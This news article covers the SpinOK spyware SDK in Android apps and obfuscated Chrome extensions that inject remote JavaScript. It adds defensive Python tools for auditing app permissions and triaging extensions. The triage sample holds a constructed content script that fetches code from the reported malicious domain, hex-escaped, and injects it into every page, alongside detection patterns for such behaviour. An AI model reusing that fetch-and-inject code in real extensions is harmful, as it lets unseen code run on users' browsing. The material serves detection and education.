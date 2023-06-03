



No wonder Google is having trouble policing its app stores. Since Monday, researchers have found that hundreds of Android apps and Chrome extensions, installed millions of times from the company's official marketplaces, contain code that can snoop on user files, manipulate clipboard contents, and inject unknown code into web pages.

Google removed many, if not all, of the malicious entries, the researchers say, but only after they were reported, and by that point the apps and extensions had already been installed on millions, possibly hundreds of millions, of devices. Researchers aren't satisfied.

A very sad place

"I'm not a fan of Google's approach," extension developer and researcher Wladimir Palant wrote in an email. "In the days before Chrome held a large share of the browser market, real people reviewed extensions before making them available on the Mozilla Marketplace. Google took a different approach, using an automated review process, and Firefox followed suit."

"Because automated reviews often miss malicious extensions, and Google responds very slowly to reports (in fact, Google rarely responds at all), this leaves users in a very sad state of affairs," Palant said.

Researchers and security advocates have long aimed the same criticism at Google's process for reviewing Android apps before they are made available on the Play marketplace. The past week made the reason for the discontent plain.

On Monday, security firm Dr.Web reported finding 101 apps in Play with a combined 421 million reported downloads. The apps contained code enabling spyware activities such as:

- Get a list of files in a specified directory
- Check the existence of a particular file or directory on the device
- Send files from the device to the developer
- Copy or replace the contents of the clipboard

ESET researcher Lukas Stefanko analyzed the apps reported by Dr.Web and confirmed the results. In an email, he said that for the file snooping to work, users must first approve a permission called READ_EXTERNAL_STORAGE, which, as the name suggests, allows apps to read files stored on the device. This is one of the more sensitive permissions a user can grant, but it is required for many features intended for the app, such as editing photos, managing downloads, handling multimedia, file browsing, and working with the camera.
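The point Stefanko makes cuts both ways: READ_EXTERNAL_STORAGE is the precondition for the file snooping, but a legitimate photo editor asks for the same thing. The following is an added example, not code from Dr.Web, ESET or the article, showing the first triage step a practitioner would take on a suspect APK: decode the manifest and audit which sensitive permissions it requests, remembering that on Android every SDK compiled into an app inherits the app's grants. The sample manifest, package name and app label are constructed for the demonstration; the set of "sensitive" permissions is illustrative rather than Android's complete protection-level table.

```python
"""Audit the permissions a decoded AndroidManifest.xml requests.

Added example, not code from Dr.Web, ESET or the article. SAMPLE_MANIFEST is
constructed for the demo; the package name and label are placeholders. For a
real APK, decode it first (e.g. `apktool d app.apk`) and feed the resulting
AndroidManifest.xml to audit().
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Runtime ("dangerous") permissions worth a second look when an app bundles an
# ad or monetisation SDK. Illustrative, not Android's full protection-level table.
SENSITIVE: Dict[str, str] = {
    "android.permission.READ_EXTERNAL_STORAGE": "read files on shared storage (Android 12 and lower)",
    "android.permission.WRITE_EXTERNAL_STORAGE": "write files on shared storage (Android 10 and lower)",
    "android.permission.MANAGE_EXTERNAL_STORAGE": "all-files access that bypasses scoped storage",
    "android.permission.READ_MEDIA_IMAGES": "read the user's photos (Android 13+)",
    "android.permission.READ_MEDIA_VIDEO": "read the user's videos (Android 13+)",
    "android.permission.READ_MEDIA_AUDIO": "read the user's audio files (Android 13+)",
    "android.permission.READ_CONTACTS": "read the address book",
    "android.permission.RECORD_AUDIO": "use the microphone",
    "android.permission.CAMERA": "use the camera",
    "android.permission.ACCESS_FINE_LOCATION": "precise location",
}

# Any one of these, once granted, lets code in the APK read files outside the app sandbox.
FILE_ACCESS = (
    "android.permission.READ_EXTERNAL_STORAGE",
    "android.permission.MANAGE_EXTERNAL_STORAGE",
    "android.permission.READ_MEDIA_IMAGES",
    "android.permission.READ_MEDIA_VIDEO",
    "android.permission.READ_MEDIA_AUDIO",
)

# Constructed sample: a photo-editor style app that legitimately needs storage
# and camera access, which is exactly why the permission alone proves nothing.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.photoeditor">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"
        android:maxSdkVersion="32"/>
    <uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <application android:label="Photo Editor"/>
</manifest>
"""


def requested_permissions(manifest_xml: str) -> Dict[str, Optional[int]]:
    """Map each <uses-permission> name to its android:maxSdkVersion (None if unbounded)."""
    root = ET.fromstring(manifest_xml)
    result: Dict[str, Optional[int]] = {}
    for node in root.iter("uses-permission"):
        name = node.get(f"{{{ANDROID_NS}}}name")
        max_sdk = node.get(f"{{{ANDROID_NS}}}maxSdkVersion")
        if name:
            result[name] = int(max_sdk) if max_sdk else None
    return result


def audit(manifest_xml: str) -> List[str]:
    """Return one finding per sensitive permission the manifest requests."""
    findings = []
    for name, max_sdk in requested_permissions(manifest_xml).items():
        if name in SENSITIVE:
            scope = f"up to API {max_sdk}" if max_sdk is not None else "on every supported Android version"
            findings.append(f"{name}: {SENSITIVE[name]}, requested {scope}")
    return findings


def can_read_shared_files(manifest_xml: str) -> bool:
    """True if, once the user consents, code in this APK can read files outside its sandbox.

    Android has no per-library permission boundary: a third-party SDK runs with
    the grants of the app that embeds it, so this is the precondition for the
    file listing and exfiltration behaviour described above.
    """
    perms = requested_permissions(manifest_xml)
    return any(p in perms for p in FILE_ACCESS)


if __name__ == "__main__":
    for finding in audit(SAMPLE_MANIFEST):
        print(finding)
    print("shared-file access possible:", can_read_shared_files(SAMPLE_MANIFEST))
```

The sample comes back as "shared-file access possible: True", and so would any real photo editor. A requested permission is necessary but not sufficient evidence, so the next step after this check is to enumerate the third-party SDKs bundled in the APK and look at where each of them sends data, rather than judging the app on its permission list.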


According to Dr.Web, the spyware functionality is provided by a software development kit (SDK) used to build each app. SDKs streamline development by handling commonly performed tasks for the developer. Dr.Web identified the SDK that enables the snooping as SpinOK. Attempts to reach the SpinOK developers for comment were unsuccessful.

Security firm CloudSEK announced on Friday that it has expanded its list of apps using SpinOK to 193, of which 43 remain available on Play. CloudSEK researchers wrote in an email:

Android.Spy.SpinOk spyware is a very concerning threat to Android devices due to its ability to collect files from infected devices and forward them to malicious attackers. This unauthorized file harvesting exposes sensitive and personal information to exposure or misuse. Additionally, the threat is further complicated by the spyware’s ability to manipulate the contents of the clipboard, potentially allowing the attacker to access sensitive data such as passwords, credit card numbers, and other confidential information. The consequences of such activities are severe and can lead to identity theft, financial fraud, and various privacy violations.

For Chrome users who get their extensions from Google's Chrome Web Store, this week hasn't been a good one either. On Wednesday, Palant reported 18 extensions that contain intentionally obfuscated code that contacts servers at serasearchtop[.]com. From there, the extensions inject JavaScript of unknown purpose into every web page the user visits. The 18 extensions have a total of about 55 million downloads.

On Friday, security firm Avast confirmed Palant's findings and identified 32 extensions with 75 million reported downloads, though it said the download numbers may have been artificially inflated.

Neither Palant nor Avast has been able to see the injected code, so exactly what the JavaScript did remains unclear. Both suspect its purpose was to hijack search results and spam users with advertisements, but they argue that the extensions were far more than spyware and instead constituted malware.

Palant explained that since arbitrary JavaScript code can be injected into any web page, the potential for abuse is very high. Search page redirects are only the one *confirmed* way this power has been abused.
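The primitive Palant describes, a content script that runs on every origin and pulls code from a remote server, is visible in an extension's files without waiting for the injected payload. The following is an added example, not Palant's or Avast's analysis code and not the actual extension files, that performs that static triage on an unpacked extension: it checks whether the manifest grants every site, then scans each script for the patterns that make remote code execution possible (network calls, `<script>` element creation, `eval`, hex-escaped strings). The sample manifest, scripts, extension name and version are constructed for the demonstration and only model the behaviour reported above; the call home uses the serasearchtop[.]com domain named in the report, hex-escaped to show why a plain grep for the domain misses it.

```python
"""Static triage of an unpacked browser extension for broad host access combined
with JavaScript that fetches and runs code from a remote server.

Added example; this is not Palant's or Avast's analysis code and not the
extensions' actual files. SAMPLE_EXTENSION is constructed to exhibit the
reported pattern. To run the triage on a real extension, load the files from
its unpacked directory into the same {filename: contents} mapping.
"""
import json
import re
from typing import Dict, List

# Match patterns that give a content script or host permission every origin.
BROAD_MATCHES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source patterns that, combined with broad host access, warrant a manual read.
INDICATORS = {
    "remote_script_element": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "dynamic_code": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "network_call": re.compile(r"\bfetch\s*\(|\bXMLHttpRequest\b"),
    "hex_escaped_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),
    "charcode_decode": re.compile(r"String\.fromCharCode\s*\("),
    "hardcoded_url": re.compile(r"https?://[a-z0-9.-]+\.[a-z]{2,}", re.I),
}

SAMPLE_EXTENSION: Dict[str, str] = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "Example Page Tools",  # placeholder
        "version": "1.0.2",
        "permissions": ["storage"],
        "host_permissions": ["<all_urls>"],
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"], "run_at": "document_start"}],
        "background": {"service_worker": "bg.js"},
    }),
    # Constructed: the host name is hex-escaped ("serasearchtop"), so a plain
    # grep for the domain fails while the obfuscation itself stands out.
    "content.js": r'''var h = "\x73\x65\x72\x61\x73\x65\x61\x72\x63\x68\x74\x6f\x70";
fetch("https://" + h + ".com/v1/config?v=1.0.2").then(function (r) { return r.text(); })
  .then(function (code) {
    var s = document.createElement("script");
    s.textContent = code;
    document.documentElement.appendChild(s);
  });
''',
    # Constructed: an unremarkable background script, to show a clean file.
    "bg.js": "chrome.runtime.onInstalled.addListener(function () {\n"
             "  chrome.storage.local.set({ installedAt: Date.now() });\n});\n",
}


def runs_on_all_sites(manifest: dict) -> bool:
    """True if a content script or host permission covers every origin."""
    patterns = set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        patterns.update(cs.get("matches", []))
    # Manifest V2 listed host patterns under "permissions"; include those too.
    patterns.update(p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>")
    return bool(patterns & BROAD_MATCHES)


def scan_script(source: str) -> List[str]:
    """Names of the INDICATORS that occur in one JavaScript source file."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def triage_extension(files: Dict[str, str]) -> Dict[str, object]:
    """Combine manifest reach with per-file indicators into a triage summary."""
    manifest = json.loads(files["manifest.json"])
    findings = {name: scan_script(src) for name, src in files.items() if name.endswith(".js")}
    findings = {name: hits for name, hits in findings.items() if hits}
    broad = runs_on_all_sites(manifest)
    # Creating script elements or evaluating strings is the primitive that lets
    # an extension run arbitrary JavaScript on every page the user visits.
    injects = any({"remote_script_element", "dynamic_code"} & set(hits) for hits in findings.values())
    return {"runs_on_all_sites": broad, "findings": findings, "needs_manual_review": broad and injects}


if __name__ == "__main__":
    print(json.dumps(triage_extension(SAMPLE_EXTENSION), indent=2))
```

On the sample, `content.js` trips the `network_call`, `remote_script_element` and `hex_escaped_string` indicators while `hardcoded_url` stays silent, which is the lesson: indicator lists built from domains are easy to defeat, so the check has to key on the capability (run fetched code on every origin) rather than on the infrastructure. The flag is a prompt for a human to read the file, not a verdict; plenty of honest extensions request `<all_urls>`.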

